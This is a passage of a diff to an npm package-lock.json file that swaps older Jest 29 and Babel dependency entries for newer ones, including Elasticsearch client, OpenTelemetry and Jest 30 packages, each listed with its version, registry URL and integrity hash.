"sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "diff-sequences": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.4.3.tgz", - "integrity": "sha512-ofrBgwpPhCD85kMKtE9RYFFq6OC1A89oW2vvgWZNCwxrUpRUILopY7lsYyMDSjc8g6U6aiO0Qubg6r4Wgt5ZnA==", - "dev": true - }, - "electron-to-chromium": { - "version": "1.4.470", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.470.tgz", - "integrity": "sha512-zZM48Lmy2FKWgqyvsX9XK+J6FfP7aCDUFLmgooLJzA7v1agCs/sxSoBpTIwDLhmbhpx9yJIxj2INig/ncjJRqg==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true - }, - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-XEdDLonERCU1n9uR56/Stx9OqojaLAQtZf9PrCHH9Hl8YXiEIka3H4NXJ3NOIBmQJTg7+j7buh34PMHfJujc8g==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.6.1", - "@types/node": "*", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "fill-range": { - "version": "7.0.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.0.1.tgz", - "integrity": "sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-replace": { - "version": "5.0.2", - "resolved": "https://registry.npmjs.org/find-replace/-/find-replace-5.0.2.tgz", - "integrity": "sha512-Y45BAiE3mz2QsrN2fb5QEtO4qb44NcS7en/0y9PEVsg351HsLeVclP8QPMH79Le9sH3rs5RSwJu99W0WPZO43Q==", - "requires": {} - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "flatbuffers": { - "version": "24.12.23", - "resolved": "https://registry.npmjs.org/flatbuffers/-/flatbuffers-24.12.23.tgz", - "integrity": "sha512-dLVCAISd5mhls514keQzmEG6QHmUUsNuWsb4tFafIUwvvgDjXhtfAYSKOzt5SWOy+qByV5pbsDZ+Vb7HUOBEdA==" - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - }, - "graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "requires": { - "function-bind": "^1.1.1" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==" - }, - "hpagent": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", - "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==" - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "is-core-module": { - "version": "2.12.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.12.1.tgz", - "integrity": "sha512-Q4ZuBAe2FUsKtyQJoQHlvP8OvBERxO3jEmy1I7hcRXcJBGGHFh/aJBswbXuS9sgrDH2QUO8ilkwNPHvHMd8clg==", - "dev": true, - "requires": { - "has": "^1.0.3" - } - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - }, - "istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.6.1.tgz", - "integrity": "sha512-Nirw5B4nn69rVUZtemCQhwxOBhm0nsp3hmtF4rzCeWD7BkjAXRIji7xWQfnTNbz9g0aVsBX6aZK3n+23LM6uDw==", - "dev": true, - "requires": { - "@jest/core": "^29.6.1", - "@jest/types": "^29.6.1", - "import-local": "^3.0.2", - "jest-cli": "^29.6.1" - } - }, - "jest-changed-files": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.5.0.tgz", - "integrity": "sha512-IFG34IUMUaNBIxjQXF/iu7g6EcdMrGRRxaUSw92I/2g2YC6vCdTltl4nHvt7Ci5nSJwXIkCu8Ka1DKF+X7Z1Ag==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - } - }, - "jest-circus": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.6.1.tgz", - "integrity": "sha512-tPbYLEiBU4MYAL2XoZme/bgfUeotpDBd81lgHLCbDZZFaGmECk0b+/xejPFtmiBP87GgP/y4jplcRpbH+fgCzQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.6.1", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.6.1", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-cli": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.6.1.tgz", - "integrity": "sha512-607dSgTA4ODIN6go9w6xY3EYkyPFGicx51a69H7yfvt7lN53xNswEVLovq+E77VsTRi5fWprLH0yl4DJgE8Ing==", - "dev": true, - "requires": { - "@jest/core": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.6.1.tgz", - "integrity": "sha512-XdjYV2fy2xYixUiV2Wc54t3Z4oxYPAELUzWnV6+mcbq0rh742X2p52pii5A3oeRzYjLnQxCsZmp0qpI6klE2cQ==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.6.1", - "@jest/types": "^29.6.1", - "babel-jest": "^29.6.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.6.1", - "jest-environment-node": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" + "node": ">=12.17" } - }, - "jest-diff": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.6.1.tgz", - "integrity": "sha512-FsNCvinvl8oVxpNLttNQX7FAq7vR+gMDGj90tiP7siWw1UdakWUGqrylpsYrpvj908IYckm5Y0Q7azNAozU1Kg==", + } + }, + "dependencies": { + "@babel/code-frame": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.27.1.tgz", + "integrity": "sha512-cjQ7ZlQ0Mv3b47hABuTevyTuYN4i+loJKGeV9flcCgIK37cCXRh+L1bd3iBHlynerhQ7BhCkn2BPbQUL+rGqFg==", "dev": true, "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.4.3", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" + "@babel/helper-validator-identifier": "^7.27.1", + "js-tokens": "^4.0.0", + "picocolors": "^1.1.1" } }, - "jest-docblock": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.4.3.tgz", - "integrity": "sha512-fzdTftThczeSD9nZ3fzA/4KkHtnmllawWrXO69vtI+L9WjEIuXWs4AmyME7lN5hU7dB0sHhuPfcKofRsUb/2Fg==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } + "@babel/helper-validator-identifier": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.27.1.tgz", + "integrity": "sha512-D2hP9eA+Sqx1kBZgzxZh0y1trbuU+JoDkiEwqhQ36nodYqJwyEIhPSdMNd7lOm/4io72luTPWH20Yda0xOuUow==", + "dev": true }, - "jest-each": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.6.1.tgz", - "integrity": "sha512-n5eoj5eiTHpKQCAVcNTT7DRqeUmJ01hsAL0Q1SMiBHcBcvTKDELixQOGMCpqhbIuTcfC4kMfSnpmDqRgRJcLNQ==", - "dev": true, + "@elastic/elasticsearch": { + "version": "8.18.2", + "resolved": "https://registry.npmjs.org/@elastic/elasticsearch/-/elasticsearch-8.18.2.tgz", + "integrity": "sha512-2pOc/hGdxkbaDavfAlnUfjJdVsFRCGqg7fpsWJfJ2UzpgViIyojdViHg8zOCT1J14lAwvDgb9CNETWa3SBZRfw==", "requires": { - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "jest-util": "^29.6.1", - "pretty-format": "^29.6.1" + "@elastic/transport": "^8.9.6", + "apache-arrow": "18.x - 19.x", + "tslib": "^2.4.0" } }, - "jest-environment-node": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.6.1.tgz", - "integrity": "sha512-ZNIfAiE+foBog24W+2caIldl4Irh8Lx1PUhg/GZ0odM1d/h2qORAsejiFc7zb+SEmYPn1yDZzEDSU5PmDkmVLQ==", - "dev": true, + "@elastic/transport": { + "version": "8.9.6", + "resolved": "https://registry.npmjs.org/@elastic/transport/-/transport-8.9.6.tgz", + "integrity": "sha512-v71jgmZtgPg2ouXF5KTPxU1a6z7YYc8nazAS7jLySteC/vrShs1OJh6oEEeo5oDc19MYUofV/JV1h5vqJVBXOw==", "requires": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" + "@opentelemetry/api": "1.x", + "debug": "^4.4.0", + "hpagent": "^1.2.0", + "ms": "^2.1.3", + "secure-json-parse": "^3.0.1", + "tslib": "^2.8.1", + "undici": "^6.21.1" } }, - "jest-get-type": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.4.3.tgz", - "integrity": "sha512-J5Xez4nRRMjk8emnTpWrlkyb9pfRQQanDrvWHhsR1+VUfbwxi30eVcZFlcdGInRibU4G5LwHXpI7IRHU0CY+gg==", + "@jest/diff-sequences": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/diff-sequences/-/diff-sequences-30.0.1.tgz", + "integrity": "sha512-n5H8QLDJ47QqbCNn5SuFjCRDrOLEZ0h8vAHCK5RL9Ls7Xa8AQLa/YxAc9UjFqoEDM48muwtBGjtMY5cr0PLDCw==", "dev": true }, - "jest-haste-map": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.6.1.tgz", - "integrity": "sha512-0m7f9PZXxOCk1gRACiVgX85knUKPKLPg4oRCjLoqIm9brTHXaorMA0JpmtmVkQiT8nmXyIVoZd/nnH1cfC33ig==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } + "@jest/get-type": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/get-type/-/get-type-30.0.1.tgz", + "integrity": "sha512-AyYdemXCptSRFirI5EPazNxyPwAL0jXt3zceFjaj8NFiKP9pOi0bfXonf6qkf82z2t3QWPeLCWWw4stPBzctLw==", + "dev": true }, - "jest-leak-detector": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.6.1.tgz", - "integrity": "sha512-OrxMNyZirpOEwkF3UHnIkAiZbtkBWiye+hhBweCHkVbCgyEy71Mwbb5zgeTNYWJBi1qgDVfPC1IwO9dVEeTLwQ==", + "@jest/pattern": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/pattern/-/pattern-30.0.1.tgz", + "integrity": "sha512-gWp7NfQW27LaBQz3TITS8L7ZCQ0TLvtmI//4OwlQRx4rnWxcPNIYjxZpDcN4+UlGxgm3jS5QPz8IPTCkb59wZA==", "dev": true, "requires": { - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" + "@types/node": "*", + "jest-regex-util": "30.0.1" + }, + "dependencies": { + "jest-regex-util": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-30.0.1.tgz", + "integrity": "sha512-jHEQgBXAgc+Gh4g0p3bCevgRCVRkB4VB70zhoAE48gxeSr1hfUOsM/C2WoJgVL7Eyg//hudYENbm3Ne+/dRVVA==", + "dev": true + } } }, - "jest-matcher-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.6.1.tgz", - "integrity": "sha512-SLaztw9d2mfQQKHmJXKM0HCbl2PPVld/t9Xa6P9sgiExijviSp7TnZZpw2Fpt+OI3nwUO/slJbOfzfUMKKC5QA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } + "@opentelemetry/api": { + "version": "1.9.0", + "resolved": "https://registry.npmjs.org/@opentelemetry/api/-/api-1.9.0.tgz", + "integrity": "sha512-3giAOQvZiH5F9bMlMiv8+GSPMeqg0dbaeo58/0SlA9sxSqZhnUtxzX9/2FzyhS9sWQf5S0GJE0AKBrFqjpeYcg==" }, - "jest-message-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.6.1.tgz", - "integrity": "sha512-KoAW2zAmNSd3Gk88uJ56qXUWbFk787QKmjjJVOjtGFmmGSZgDBrlIL4AfQw1xyMYPNVD7dNInfIbur9B2rd/wQ==", - "dev": true, + "@swc/helpers": { + "version": "0.5.17", + "resolved": "https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.17.tgz", + "integrity": "sha512-5IKx/Y13RsYd+sauPb2x+U/xZikHjolzfuDgTAl/Tdf3Q8rslRvC19NKDLgAJQ6wsqADk10ntlv08nPFw/gO/A==", "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "stack-utils": 